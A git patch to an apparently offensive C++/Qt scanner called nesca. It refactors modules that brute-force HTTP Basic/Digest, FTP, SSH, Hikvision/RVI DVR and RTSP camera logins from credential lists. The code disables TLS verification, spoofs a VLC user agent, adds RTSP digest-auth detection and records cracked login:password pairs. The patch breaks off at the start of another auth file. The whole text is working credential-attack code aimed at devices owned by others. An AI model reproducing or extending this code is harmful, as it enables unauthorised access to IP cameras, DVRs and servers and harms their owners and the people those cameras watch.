From 536342b6f4b6f53ce6c659a3d02d93a32439a487 Mon Sep 17 00:00:00 2001 From: cora32 Date: Sun, 28 Feb 2016 19:07:10 +0300 Subject: [PATCH] - --- BasicAuth.cpp | 61 ++++++------ Connector.cpp | 221 +++++++++++++++++++++----------------------- Connector.h | 5 +- FTPAuth.cpp | 40 ++------ FileUpdater.cpp | 44 +++------ HikvisionLogin.cpp | 85 +++++------------ IPCAuth.cpp | 89 +++++++++--------- MainStarter.cpp | 6 +- SSHAuth.cpp | 50 ++-------- Utils.cpp | 36 ++++++-- Utils.h | 6 +- WebformWorker.cpp | 26 +----- finder.cpp | 183 ++++++++++++++++++++++-------------- mainResources.h | 27 +++--- nesca_3.cpp | 131 ++++++++++---------------- nesca_3.h | 2 +- nesca_3.ui | 56 ++++++----- progressbardrawer.h | 2 +- version | 2 +- 19 files changed, 477 insertions(+), 595 deletions(-) diff --git a/BasicAuth.cpp b/BasicAuth.cpp index 7a38169..d44bfc2 100644 --- a/BasicAuth.cpp +++ b/BasicAuth.cpp @@ -90,6 +90,10 @@ lopaStr BA::BABrute(const char *ipOrig, const int port, bool performDoubleCheck) int sz = con.nConnect(ipOrig, port, &buff); + if (Utils::ustrstr(&buff, "404 not found") != -1 || Utils::ustrstr(&buff, "404 site") != -1) { + return lps; + } + char ip[256] = { 0 }; if (sz == 0) { @@ -124,6 +128,11 @@ lopaStr BA::BABrute(const char *ipOrig, const int port, bool performDoubleCheck) } int isDig = Utils::isDigest(&buff); + if (-2 == isDig) { + QString ipString = QString(ip); + stt->doEmitionFoundData("404 not found - " + ipString + ""); + return lps; + } if (isDig == -1) { if (performDoubleCheck) { Sleep(gTimeOut); @@ -157,26 +166,31 @@ lopaStr BA::BABrute(const char *ipOrig, const int port, bool performDoubleCheck) return lps; } + char login[32] = { 0 }; + char pass[32] = { 0 }; for(int i = 0; i < MaxLogin; ++i) { + FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; }); + strcpy(login, loginLst[i]); for (int j = 0; j < MaxPass; ++j) { FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;}); if (!globalScanFlag) return lps; - lpString = string(loginLst[i]) + ":" + string(passLst[j]); + strcpy(pass, passLst[j]); + + lpString = string(login) + ":" + string(pass); Connector con; res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString, digestMode); - if (res == -2) return lps; + if (res == -2) { + rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "TIMEOUT", rowIndex); + + return lps; + } else if (res != -1) { res = checkOutput(&buffer, ip, port); if (res == -2) { - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip), "--", "404"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "404"); - } + rowIndex = Utils::addBARow(QString(ip), "--", "404", rowIndex); strcpy(lps.other, "404"); return lps; } @@ -185,42 +199,21 @@ lopaStr BA::BABrute(const char *ipOrig, const int port, bool performDoubleCheck) break; } if (res == 1) { - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip), QString(loginLst[i]) + ":" + QString(passLst[j]), "OK"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(loginLst[i]) + ":" + QString(passLst[j]), "OK"); - } + rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK", rowIndex); - strcpy(lps.login, loginLst[i]); - strcpy(lps.pass, passLst[j]); + strcpy(lps.login, login); + strcpy(lps.pass, pass); return lps; }; } - if (BALogSwitched) { - if (rowIndex == -1) { - rowIndex = nesca_3::addBARow(QString(ip), - QString(loginLst[i]) + ":" + QString(passLst[j]), - QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(loginLst[i]) + ":" + QString(passLst[j]), - QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%"); - } - } - else { rowIndex = -1; } + rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex); ++passCounter; Sleep(50); } } - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip), "--", "FAIL"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); - } + rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex); return lps; } diff --git a/Connector.cpp b/Connector.cpp index 024c2f0..e3917a3 100644 --- a/Connector.cpp +++ b/Connector.cpp @@ -99,10 +99,10 @@ int my_trace(CURL *handle, curl_infotype type, if (type == CURLINFO_HEADER_OUT) { //data[size] = '\0'; //Activity += strlen(data); + data[size] = '\0'; QString qData = QString(data); Activity += qData.length(); stt->doEmitionAddOutData(qData); - data[0] = '\0'; } //else if (type == CURLINFO_HEADER_IN) { // QString qData = QString(data); @@ -164,6 +164,7 @@ int pConnect(const char* ip, const int port, std::string *buffer, "Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0"); curl_easy_setopt(curl, CURLOPT_HEADER, 1L); curl_easy_setopt(curl, CURLOPT_AUTOREFERER, 1L); + curl_easy_setopt(curl, CURLOPT_SSL_VERIFYSTATUS, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback); @@ -208,7 +209,10 @@ int pConnect(const char* ip, const int port, std::string *buffer, int sz = buffer->size(); curl_easy_cleanup(curl); - if (res == CURLE_OK || (port == 21 && sz > 0)) { + + if (res == 35) { + return -1; + } else if (res == CURLE_OK || sz > 0) { return sz; } else if (res == CURLE_LOGIN_DENIED && port == 21) { @@ -270,7 +274,7 @@ int pConnect(const char* ip, const int port, std::string *buffer, return -1; }; } -int pConnectRTSP(const char* ip, const int port, std::string *buffer, const std::string *lpString) +int pConnectRTSP(const char* ip, const int port, std::string *buffer, const std::string *lpString, bool isDigest) { buffer->clear(); int res = 0; @@ -278,7 +282,7 @@ int pConnectRTSP(const char* ip, const int port, std::string *buffer, const std: if (curl != NULL) { - //curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L); + curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L); if (MapWidgetOpened) { struct data config; config.trace_ascii = 1; /* enable ascii tracing */ @@ -287,124 +291,41 @@ int pConnectRTSP(const char* ip, const int port, std::string *buffer, const std: curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } - char newIP[128] = {0}; - strcpy(newIP, "rtsp://"); - strncat(newIP, ip, 96); - strcat(newIP, "/ch1/main"); - /*int y = curl_easy_setopt(curl, CURLOPT_VERBOSE, 0L); - y = curl_easy_setopt(curl, CURLOPT_NOPROGRESS, 1L); - y = curl_easy_setopt(curl, CURLOPT_HEADERDATA, stdout);*/ - //curl_easy_setopt(curl, CURLOPT_URL, newIP); - //curl_easy_setopt(curl, CURLOPT_PORT, port); - curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, newIP); - //y = curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_OPTIONS); - //int y = curl_easy_setopt(curl, CURLOPT_URL, ip); - //y = curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, ip); - //curl_easy_setopt(curl, CURLOPT_PORT, port); - /*y = curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_OPTIONS); - res = curl_easy_perform(curl); - y = curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_DESCRIBE);*/ - res = curl_easy_perform(curl); - - //curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_DESCRIBE); - //curl_easy_setopt(curl, CURLOPT_USERAGENT, - // "Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0"); - //curl_easy_setopt(curl, CURLOPT_HEADER, 1L); - //curl_easy_setopt(curl, CURLOPT_AUTOREFERER, 1L); - //curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); - //curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); - //curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback); - //curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer); - //int proxyPort = std::atoi(gProxyPort); - //if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort); - //curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP); - ////curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); - //curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut); - //curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3); - - //if (lpString != NULL) { - // curl_easy_setopt(curl, CURLOPT_UNRESTRICTED_AUTH, 1L); - // //curl_easy_setopt(curl, CURLOPT_FTPLISTONLY, 1L); - // curl_easy_setopt(curl, CURLOPT_USERPWD, lpString->c_str()); - // //curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST); - // res = curl_easy_perform(curl); - // /*if (digestMode) - // { - // curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST); - // res = curl_easy_perform(curl); - - // if (port != 21 && lpString != NULL) { - // int pos = Utils::ustrstr(*buffer, "\r\n\r\n"); - // if (pos != -1) { - // *buffer = buffer->substr(pos + 4); - // } - // } - // } - // else res = curl_easy_perform(curl);*/ - //} - //else res = curl_easy_perform(curl); - - int sz = buffer->size(); - - curl_easy_cleanup(curl); - if (res == CURLE_OK || (port == 21 && sz > 0)) { - if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); - Activity += sz; - return sz; - } - else if (res == CURLE_LOGIN_DENIED && port == 21) { - return -1; - } - else if (res == CURLE_OPERATION_TIMEDOUT - || res == CURLE_COULDNT_CONNECT - || res == CURLE_SEND_ERROR - || res == CURLE_RECV_ERROR - ) { - SOCKET eNobuffSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); - shutdown(eNobuffSocket, SD_BOTH); - closesocket(eNobuffSocket); - if (ENOBUFS == eNobuffSocket || ENOMEM == eNobuffSocket) { - stt->doEmitionRedFoundData("Insufficient buffer/memory space. Sleeping for 10 sec..."); - Sleep(10000); - } - return -1; + curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, CURL_RTSPREQ_DESCRIBE); + curl_easy_setopt(curl, CURLOPT_USERAGENT, + "LibVLC/2.1.5 (LIVE555 Streaming Media v2014.05.27)"); + curl_easy_setopt(curl, CURLOPT_URL, ip); + curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, ip); + curl_easy_setopt(curl, CURLOPT_HEADER, 1L); + curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback); + curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer); + int proxyPort = std::atoi(gProxyPort); + if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort); + curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP); + curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut); + curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3); + if (isDigest) { + curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST); } else { - if (res == 6) return -2; - else if (res != 13 && - res != 67 && - res != 52 && - res != 56 && - res != 35 && - res != 19 && - res != 23) - { - if (res == 5) { - stt->doEmitionRedFoundData("The given proxy host could not be resolved."); - return -2; - } - else if (res == 8) { - stt->doEmitionFoundData("Strange ftp reply. (" + - QString::number(res) + ") " + QString(ip)); - return -2; - } - else if (res == 18) { - return -2; - } - else stt->doEmitionRedFoundData("CURL error: (" + QString::number(res) + ") " + QString(ip)); - }; + curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_BASIC); + } + curl_easy_setopt(curl, CURLOPT_USERPWD, lpString->c_str()); + res = curl_easy_perform(curl); + + int sz = buffer->size(); + curl_easy_cleanup(curl); + + if (res == CURLE_OK || sz > 0) { return sz; } - - if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); - - return sz; - } - else { - stt->doEmitionRedFoundData("Curl error."); + return -1; - }; + } + + stt->doEmitionRedFoundData("Curl error."); + return -1; } void eraser(std::string *buffer, const std::string delim1, const std::string delim2) { @@ -430,14 +351,14 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer, const std::vector *customHeaders, const std::string *lpString, bool digestMode, - bool isRTSP){ + bool isRTSP, bool isDigest){ int res = 0; if (!isRTSP) { res = pConnect(ip, port, buffer, postData, customHeaders, lpString, digestMode); } else { - res = pConnectRTSP(ip, port, buffer, lpString); + res = pConnectRTSP(ip, port, buffer, lpString, isDigest); } cutoutComments(buffer); @@ -447,6 +368,67 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer, return res; } +int Connector::checkIsDigestRTSP(const char *ip, std::string *buffer) { + + buffer->clear(); + int res = 0; + CURL *curl = curl_easy_init(); + + if (curl != NULL) + { + curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L); + if (MapWidgetOpened) { + struct data config; + config.trace_ascii = 1; /* enable ascii tracing */ + curl_easy_setopt(curl, CURLOPT_DEBUGFUNCTION, my_trace); + curl_easy_setopt(curl, CURLOPT_DEBUGDATA, &config); + curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); + } + + curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, CURL_RTSPREQ_DESCRIBE); + curl_easy_setopt(curl, CURLOPT_USERAGENT, + "LibVLC/2.1.5 (LIVE555 Streaming Media v2014.05.27)"); + curl_easy_setopt(curl, CURLOPT_URL, ip); + curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, ip); + curl_easy_setopt(curl, CURLOPT_HEADER, 1L); + curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback); + curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer); + int proxyPort = std::atoi(gProxyPort); + if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort); + curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP); + curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut); + curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3); + + res = curl_easy_perform(curl); + + int sz = buffer->size(); + + curl_easy_cleanup(curl); + if (res == CURLE_OK || sz > 0) { + if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); + Activity += sz; + + if (Utils::ustrstr(buffer, "200 ok") != -1) { + return 2; + } + else if (Utils::ustrstr(buffer, "not found") != -1) { + return -1; + } + else if (Utils::ustrstr(buffer, "digest") != -1) { + return 1; + } + else { + return 0; + } + } + + return -1; + } + + stt->doEmitionRedFoundData("Curl error."); + return -1; +} + bool portCheck(const char * sDVRIP, int wDVRPort) { // sockaddr_in sa; // sa.sin_family = AF_INET; @@ -581,6 +563,9 @@ int Connector::connectToPort(char* ip, int port) //strcpy(tempIp, "ftp://"); sprintf(tempIp, "ftp://%s:%d", ip, port); } + /*else if (554 == port) { + sprintf(tempIp, "rtsp://%s:%d", ip, port); + }*/ else { //strcpy(tempIp, "http://"); sprintf(tempIp, "http://%s:%d", ip, port); diff --git a/Connector.h b/Connector.h index d663440..299371f 100644 --- a/Connector.h +++ b/Connector.h @@ -8,7 +8,7 @@ #include #include #pragma comment(lib, "iphlpapi.lib") -#pragma comment(lib,"curllib.lib") +//#pragma comment(lib,"libcurldll.a") #endif #include @@ -39,7 +39,8 @@ public: const std::vector *customHeaders = NULL, const std::string *lpString = NULL, bool digestMode = false, - bool isRTSP = false); + bool isRTSP = false, bool isDigest = true); int connectToPort(char *ip, int port); + int checkIsDigestRTSP(const char *ip, std::string *buffer); }; #endif // CONNECTOR_H diff --git a/FTPAuth.cpp b/FTPAuth.cpp index 969f4ea..777c0d0 100644 --- a/FTPAuth.cpp +++ b/FTPAuth.cpp @@ -19,9 +19,8 @@ lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) { int passCounter = 0; int rowIndex = -1; - char login[128] = {0}; + char login[32] = {0}; char pass[32] = {0}; - //char nip[128] = { 0 }; for (int i = 0; i < MaxFTPLogin; ++i) { @@ -37,18 +36,12 @@ lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) { strcpy(pass, ftpPassLst[j]); if (strlen(pass) <= 1) continue; - lpString = string(login) - + string(pass); + lpString = string(login) + string(pass); Connector con; res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString); if (res == -2) { - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip), "--", "FAIL"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); - } + rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex); return lps; } else if (res != -1) { @@ -57,39 +50,18 @@ lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) { strcpy(lps.pass, pass); ps->directoryCount = std::count(buffer.begin(), buffer.end(), '\n'); - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), "OK"); - } + rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK", rowIndex); return lps; }; - if (BALogSwitched) { - if (rowIndex == -1) { - rowIndex = nesca_3::addBARow(QString(ip), - QString(login) + ":" + QString(pass), - QString::number((passCounter / (double)(MaxFTPPass*MaxFTPLogin)) * 100).mid(0, 4) + "%"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), - QString::number((passCounter / (double)(MaxFTPPass*MaxFTPLogin)) * 100).mid(0, 4) + "%"); - } - } - else { rowIndex = -1; } + rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxFTPPass*MaxFTPLogin)) * 100).mid(0, 4) + "%", rowIndex); ++passCounter; Sleep(50); } } - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip), "--", "FAIL"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); - } + rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex); return lps; } diff --git a/FileUpdater.cpp b/FileUpdater.cpp index 47dbecf..4801b49 100644 --- a/FileUpdater.cpp +++ b/FileUpdater.cpp @@ -55,8 +55,7 @@ void updateLogin() { while(fgets(buffFG, 32, loginList) != NULL) { MaxLogin++; - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; rewind(loginList); @@ -75,8 +74,7 @@ void updateLogin() { if(strstr(buffFG, "\n") != NULL) strncat(loginLst[i++], buffFG, strlen(buffFG) - 1); else strncat(loginLst[i++], buffFG, strlen(buffFG)); - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; if(FileUpdater::oldLoginLstSize == 0) stt->doEmitionGreenFoundData("Login list loaded (" + QString::number(MaxLogin) + " entries)"); @@ -110,8 +108,7 @@ void updatePass() { while(fgets(buffFG, 32, passList) != NULL) { MaxPass++; - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; rewind(passList); @@ -130,8 +127,7 @@ void updatePass() { if(strstr(buffFG, "\n") != NULL) strncat(passLst[i++], buffFG, strlen(buffFG) - 1); else strncat(passLst[i++], buffFG, strlen(buffFG)); - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; if(FileUpdater::oldPassLstSize == 0) stt->doEmitionGreenFoundData("Password list loaded (" + QString::number(MaxPass) + " entries)"); @@ -157,7 +153,6 @@ void updateSSH() { MaxSSHPass = 0; char buffFG[32] = {0}; - //ZeroMemory(buffFG, sizeof(buffFG)); FILE *sshlpList = fopen(SSH_PASS_FN, "r"); @@ -166,7 +161,7 @@ void updateSSH() { while(fgets(buffFG, 32, sshlpList) != NULL) { ++MaxSSHPass; - //ZeroMemory(buffFG, sizeof(buffFG)); + ZeroMemory(buffFG, sizeof(buffFG)); buffFG[0] = 0; }; @@ -186,8 +181,7 @@ void updateSSH() { if(strstr(buffFG, "\n") != NULL) strncat(sshlpLst[i++], buffFG, strlen(buffFG) - 1); else strncat(sshlpLst[i++], buffFG, strlen(buffFG)); - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; if(FileUpdater::oldSSHLstSize == 0) stt->doEmitionGreenFoundData("SSH Password list loaded (" + QString::number(MaxSSHPass) + " entries)"); @@ -221,8 +215,7 @@ void updateWFLogin() { while(fgets(buffFG, 32, wfLoginList) != NULL) { MaxWFLogin++; - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; rewind(wfLoginList); @@ -241,8 +234,7 @@ void updateWFLogin() { if(strstr(buffFG, "\n") != NULL) strncat(wfLoginLst[i++], buffFG, strlen(buffFG) - 1); else strncat(wfLoginLst[i++], buffFG, strlen(buffFG)); - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; if(FileUpdater::oldWFLoginLstSize == 0) stt->doEmitionGreenFoundData("WFLogin list loaded (" + QString::number(MaxWFLogin) + " entries)"); @@ -271,8 +263,7 @@ void updateWFPass() { while(fgets(buffFG, 32, wfPassList) != NULL) { MaxWFPass++; - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; rewind(wfPassList); @@ -291,8 +282,7 @@ void updateWFPass() { if(strstr(buffFG, "\n") != NULL) strncat(wfPassLst[i++], buffFG, strlen(buffFG) - 1); else strncat(wfPassLst[i++], buffFG, strlen(buffFG)); - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; if(FileUpdater::oldWFPassLstSize == 0) stt->doEmitionGreenFoundData("WFPassword list loaded (" + QString::number(MaxWFPass) + " entries)"); @@ -321,8 +311,7 @@ void updateFTPLogin() { while (fgets(buffFG, 32, ftpLoginList) != NULL) { MaxFTPLogin++; - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; rewind(ftpLoginList); @@ -341,8 +330,7 @@ void updateFTPLogin() { if (strstr(buffFG, "\n") != NULL) strncat(ftpLoginLst[i++], buffFG, strlen(buffFG) - 1); else strncat(ftpLoginLst[i++], buffFG, strlen(buffFG)); - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; if (FileUpdater::oldFTPLoginLstSize == 0) stt->doEmitionGreenFoundData("FTP login list loaded (" + QString::number(MaxFTPLogin) + " entries)"); @@ -371,8 +359,7 @@ void updateFTPPass() { while (fgets(buffFG, 32, ftpPassList) != NULL) { ++MaxFTPPass; - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; rewind(ftpPassList); @@ -391,8 +378,7 @@ void updateFTPPass() { if (strstr(buffFG, "\n") != NULL) strncat(ftpPassLst[i++], buffFG, strlen(buffFG) - 1); else strncat(ftpPassLst[i++], buffFG, strlen(buffFG)); - //ZeroMemory(buffFG, sizeof(buffFG)); - buffFG[0] = 0; + ZeroMemory(buffFG, sizeof(buffFG)); }; if (FileUpdater::oldFTPPassLstSize == 0) stt->doEmitionGreenFoundData("FTP password list loaded (" + QString::number(MaxFTPPass) + " entries)"); @@ -422,7 +408,7 @@ void updateList(const char *fileName, long *szPtr, void *funcPtr(void)) { void FileUpdater::updateLists() { running = true; while(globalScanFlag) { - Sleep(600000); + Sleep(1000); if(!globalScanFlag) break; loadOnce(); } diff --git a/HikvisionLogin.cpp b/HikvisionLogin.cpp index 9f5e77c..35c8793 100644 --- a/HikvisionLogin.cpp +++ b/HikvisionLogin.cpp @@ -349,7 +349,7 @@ bool HikVis::checkSAFARI(const char * sDVRIP, int port) { return false; } - +#include "Utils.h" lopaStr HikVis::hikLogin(const char * sDVRIP, int wDVRPort) { lopaStr lps = { "UNKNOWN", "", "" }; @@ -358,18 +358,15 @@ lopaStr HikVis::hikLogin(const char * sDVRIP, int wDVRPort) strcpy(ip, sDVRIP); int rowIndex = -1; - char login[64] = { 0 }; - char pass[64] = { 0 }; + char login[32] = { 0 }; + char pass[32] = { 0 }; for (int i = 0; i < MaxLogin; ++i) { + FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; }); + strcpy(login, loginLst[i]); for (int j = 0; j < MaxPass; ++j) { FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; }); if (!globalScanFlag) return lps; - /*ZeroMemory(login, 64); - ZeroMemory(pass, 64);*/ - login[0] = 0; - pass[0] = 0; - strcpy(login, loginLst[i]); strcpy(pass, passLst[j]); NET_DVR_DEVICEINFO_V30 *info = 0; @@ -380,39 +377,20 @@ lopaStr HikVis::hikLogin(const char * sDVRIP, int wDVRPort) strcpy(lps.login, login); strcpy(lps.pass, pass); - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), "OK"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), "OK"); - } - + rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), "OK", rowIndex); + return lps; } - if (BALogSwitched) { - if (rowIndex == -1) { - rowIndex = nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort), - QString(login) + ":" + QString(pass), - QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), - QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%"); - } - } - else{ rowIndex = -1; } + rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex); + ++passCounter; Sleep(200); } } - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort), "--", "FAIL"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); - } + rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), "--", "FAIL", rowIndex); + return lps; } @@ -467,6 +445,7 @@ int rvi_login_ptr(const char *sDVRIP, int wDVRPort, const char *login, const cha return -1; } +#include "Utils.h" lopaStr HikVis::rviLogin(const char * sDVRIP, int wDVRPort) { lopaStr lps = { "UNKNOWN", "", "" }; @@ -475,18 +454,15 @@ lopaStr HikVis::rviLogin(const char * sDVRIP, int wDVRPort) strcpy(ip, sDVRIP); int rowIndex = -1; - char login[64] = { 0 }; - char pass[64] = { 0 }; + char login[32] = { 0 }; + char pass[32] = { 0 }; for (int i = 0; i < MaxLogin; ++i) { + FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; }); + strcpy(login, loginLst[i]); for (int j = 0; j < MaxPass; ++j) { FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; }); if (!globalScanFlag) return lps; - /*ZeroMemory(login, 64); - ZeroMemory(pass, 64);*/ - login[0] = 0; - pass[0] = 0; - strcpy(login, loginLst[i]); strcpy(pass, passLst[j]); if (strlen(login) > 8) break; @@ -496,39 +472,20 @@ lopaStr HikVis::rviLogin(const char * sDVRIP, int wDVRPort) strcpy(lps.login, login); strcpy(lps.pass, pass); - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), "OK"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), "OK"); - } + rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), "OK", rowIndex); return lps; } - if (BALogSwitched) { - if (rowIndex == -1) { - rowIndex = nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort), - QString(login) + ":" + QString(pass), - QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), - QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%"); - } - } - else { rowIndex = -1; } + rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex); + ++passCounter; Sleep(200); } } - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort), "--", "FAIL"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); - } + rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), "--", "FAIL", rowIndex); + return lps; } diff --git a/IPCAuth.cpp b/IPCAuth.cpp index 6abf528..641350b 100644 --- 